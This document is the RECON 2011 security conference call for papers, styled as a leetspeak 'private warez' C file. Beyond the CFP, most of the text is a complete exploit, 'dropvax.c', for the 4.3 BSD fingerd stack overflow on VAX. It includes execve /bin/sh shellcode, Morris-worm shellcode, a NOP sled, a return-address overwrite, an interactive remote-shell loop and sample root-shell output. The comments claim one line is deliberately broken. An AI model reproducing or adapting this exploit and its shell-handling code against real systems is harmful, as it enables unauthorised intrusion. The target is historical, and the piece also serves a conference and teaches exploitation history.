/* + + + + + + + + + \ / + _ - _+_ - ,__ _=. .:. /=\ _|===|_ ||::| | | _|. | | | | | | __===_ -=- ||::| |==| | | __ |.:.| /\| |:. | | | | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ; ' | ' : ` : ' . ' . . : ' . R E C O N 2 0 1 1 . ` . . ' . C F P 0000000 REC0N 2011 (http://recon.cx) 0000020 JULY 8-10 0000040 HYATT REGENCY (New venue) 0000060 M0NTREAL 0000100 0000120 + REC0N 2011 0000140 - Conference and training 0000160 - No censorship, no sales pitches 0000200 - Videos from 2010 are coming online 0000220 0000240 + Now accepting submissions 0000260 - Single track 0000300 - 60 & 30 minute time slots 0000320 - Lightning talks at the party 0000340 0000360 + Primary topics 0000400 - Reverse engineering and/or exploitation: 0000420 + Software 0000440 - Malware 0000460 - Protection/DRM 0000500 - Anti-reversing 0000520 - Static/runtime analysis 0000540 + Hardware 0000560 - Embedded devices, consoles, femtocell 0000600 - Cellphones 0000620 - RFID, SDR (software defined radio) 0000640 - Side channel attacks 0000660 - Physical security (cameras, access control) 0000700 + Protocol 0000720 - GSM / CDMA 0000740 0000760 + Also of interest to us 0001000 - Privacy 0001020 + Anti-censorship 0001040 + Anti-surveillance 0001060 + Anonymity 0001100 + Counter-forensics 0001120 0001140 + Anything else elite 0001160 0001200 + Please include 0001220 - Short summary 0001240 - Name or alias 0001260 - Contact information 0001300 - Bio 0001320 0001340 + Important dates 0001360 - Training/conference registration opens March 20, 2011 0001400 - First round of selections: April 10, 2011 0001420 - CFP closes May 15, 2011 0001440 0001460 + Send submissions to 0001500 - cfp2011 @ recon.cx 0001520 0001540 + Speaker / attendee privacy 0001560 - Recon does not require speakers use their real names 0001600 - Recon does not provide attendee or speaker information to third-parties 0001620 (except where necessary for registration/payment) * w0rd, n0w ph0r th3 g00dz.. * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] * * dr0pv4x.c * t0p-s3kR1t w4r3z k0m1n' @ ya * str8 fr0m the k0d3l1n3 * -th3 phr3zh pr1nc3 0f b3llk0r3 * w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2: route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm, klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root@vax.recon.cx (lol), SN, Fravia, Mammon_, m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak, archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga, Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm, w1z4rd, l0renz, Subgraph & The Future Crew * a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz * st3p 1: c0mp1l3 * st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4 OLD WAREZ = NO WAREZ ;) * st3p 3: ./dr0pv4x [target] offset + pr3st0 + $ ./dropvax X.X.X.X -12345 [+] ATDT X.X.X.X [+] CONNECT 9600 [+] Return address: 0xUWISH [*] Compiled for little-endian arch. [+] Sent payload... [+] Shell! 4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004 16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03 User tty from login@ idle JCPU PCPU what root co 10:49 1 -sh -if whoami: root Warning: no access to tty; thus no job control in this shell... # exit k p8ce 0ut, - dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3 Responsible Disclosure: ++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0 f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++ * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] * (research purposes only!!!) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef BIG_ENDIAN_ARCH #define bswap(value) \ (((u32) (value)) << 24 |\ (((u32) (value)) & 0x0000FF00) << 8 |\ (((u32) (value)) & 0x00FF0000) >> 8 |\ ((u32) (value)) >> 24) #else #define bswap(value) (value) #endif extern int errno; int try_finger(char *, int); void fdsh(int); uint32_t typedef u32; #ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */ /* execve("/bin/sh", NULL, NULL) - Take advantage of the 4.3 BSD UNIX VM. It always puts the process entry point (_start) at address 0x00000000. This gives us valid memory (a zero-byte string, since the first two bytes of procedures like _start on VAX (those called with "callg" instr.) are the saved register-mask, and in _start's case this is zero (does not matter). Furthermore, this line in kern_exec.c checks if: if (ap == NULL && uap->envp) { uap->argp = NULL; ... } So we don't need a valid argv at address zero. See the VAX Architecture Reference Manual (VARM) or the VAX Arcitecture Handbook. http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy of the internal version of the VARM, which will help explain the stack frame and the instruction set. */ unsigned char shellcode[] = "\021\017" /* brb shellcode+0x11 (PC-relative) */ "\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */ "\335\000\335\000" /* pushl $0 ; pushl $0 */ "\335P" /* pushl %r0 (address of /bin/sh string) */ "\335\003" /* pushl $0x3 */ "\320^\\" /* movl %sp, %ap */ "\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */ "\026\357\353" /* jsb shellcode+0x4 (PC-relative) */ "\377\377\377" "/bin/sh"; /* .asciz "/bin/sh" */ #else /* USE_ALTERNATE_SHELLCODE */ /* RTMorris Internet Worm (1988) */ /* If you think the shellcode is the problem, try this one. */ u32 shellcode[] = { bswap(0x732f8fdd), bswap(0x8fdd0068), bswap(0x6e69622f), bswap(0xdd5a5ed0), bswap(0xdd00dd00), bswap(0xd003dd5a), bswap(0x3bbc5c5e) }; #endif #define Send(str) send(sock, (str), strlen(str), 0) void fdsh(int sock) { printf("[+] Sent payload...\n"); sleep(1); Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n"); Send("export PATH\n"); Send("strings /vmunix | fgrep UNIX\n"); Send("w ; echo whoami: ; whoami; exec csh -if\n"); for (;;) { fd_set fds; char buf[2048]; int nb; FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) { perror("select"); return; } if (FD_ISSET(0, &fds)) { nb = read(0, buf, sizeof(buf)); if (nb <= 0) { perror("read(2)"); return; } send(sock, buf, nb, 0); } if (FD_ISSET(sock, &fds)) { nb = read(sock, buf, sizeof(buf)); if (nb <= 0) { perror("read(2)"); return; } write(1, buf, nb); } } } /* This routine exploits a fixed 512 byte input buffer in a VAX running * the BSD 4.3 fingerd binary. It send 536 bytes (plus a newline) to * overwrite six extra words in the stack frame, including the return * PC, to point into the middle of the string sent over. The instructions * in the string do the direct system call version of execve("/bin/sh"). */ /* From sp4f ^^^^^^^ (lolololol) */ /* * Here's what the VAX-11 stack frame looks like (from 4.3 BSD's : */ #if 0 struct frame { int fr_handler; u_int fr_psw:16, /* saved psw */ fr_mask:12, /* register save mask */ :1, fr_s:1, /* call was a calls, not callg */ fr_spa:2; /* stack pointer alignment */ int fr_savap; /* saved arg pointer */ int fr_savfp; /* saved frame pointer */ int fr_savpc; /* saved program counter */ }; #endif int try_finger(char *host, int offset) { int s, i; struct sockaddr_in sin = { 0 }; u32 retaddr = 0x7fffe8a8 - offset; char buf[536]; sin.sin_family = PF_INET; sin.sin_port = htons(79); sin.sin_addr.s_addr = inet_addr(host); if (sin.sin_addr.s_addr == -1) { struct hostent *h; h = gethostbyname(host); if (h == NULL) { herror("gethostbyname(3)"); return -1; } bcopy(h->h_addr, &sin.sin_addr, sizeof(u32)); } if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { perror("socket(2)"); return -1; } printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr)); if (connect(s, (void *)&sin, sizeof(sin)) < 0){ perror("connect(2)"); printf("[-] NO DIALTONE\n"); return -1; } printf("[+] CONNECT 9600\n"); for (i = 0; i < 400; i++) buf[i] = '\001'; /* VAX-11 NOP */ bcopy(shellcode, buf + 400, sizeof(shellcode)); for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++) buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */ printf("[+] Return address: %#x\n", retaddr); #ifdef BIG_ENDIAN_ARCH printf("[*] Compiled for big-endian arch.\n"); #else printf("[*] Compiled for little-endian arch.\n"); #endif *((u32 *)buf + 128) = bswap(0x7fffeab0); *((u32 *)buf + 129) = bswap(0x7fffeb60); *((u32 *)buf + 130) = bswap(0x20000000); *((u32 *)buf + 131) = bswap(0x7fffeb64); *((u32 *)buf + 132) = bswap(retaddr); *((u32 *)buf + 133) = 0; send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */ send(s, "\n", 1, 0); fdsh(s); printf("[-] NO CARRIER\n"); return 0; } main(int c, char **v) { char *host = v[1], *ofs = v[2]; if (!*(++v)) { fprintf(stderr, "usage: %s hostname [offset]\n", *(--v)); exit(1); } if (c > 2) try_finger(host, atoi(ofs)); else try_finger(host, 0); exit(0); }